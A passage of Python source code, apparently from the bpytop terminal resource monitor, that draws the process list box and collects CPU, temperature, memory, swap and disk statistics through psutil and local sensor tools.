cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in it's own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_upper: List[int] = []
cpu_lower: List[int] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(ceil(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
cpu_times_percent = psutil.cpu_times_percent()
for x in ["upper", "lower"]:
if getattr(CONFIG, "cpu_graph_" + x) == "total":
setattr(cls, "cpu_" + x, cls.cpu_usage[0])
else:
getattr(cls, "cpu_" + x).append(ceil(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
del getattr(cls, "cpu_" + x)[0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(ceil(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if CONFIG.show_cpu_freq and hasattr(psutil.cpu_freq(), "current"):
freq: float = psutil.cpu_freq().current
cls.cpu_freq = round(freq * (1 if freq > 10 else 1000))
elif cls.cpu_freq > 0:
cls.cpu_freq = 0
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label):
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current"):
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current"):
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
disks_io_dict: Dict[str, Dict[str, List[int]]] = {}
recheck_diskutil: bool = True
diskutil_map: Dict[str, str] = {}
io_error: bool = False
old_disks: List[str] = []
old_io_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string_r: str
io_string_w: str
u_percent: int
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if SYSTEM == "MacOS" and cls.recheck_diskutil:
cls.recheck_diskutil = False
try:
dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
for line in dutil_out.split("\n"):
line = line.replace("\u2068", "").replace("\u2069", "")
if line.startswith("/dev/"):
xdisk = line.split()[0].replace("/dev/", "")
elif "Container" in line:
ydisk = line.split()[3]
if xdisk and ydisk:
cls.diskutil_map[xdisk] = ydisk
xdisk = ydisk = ""
except:
pass
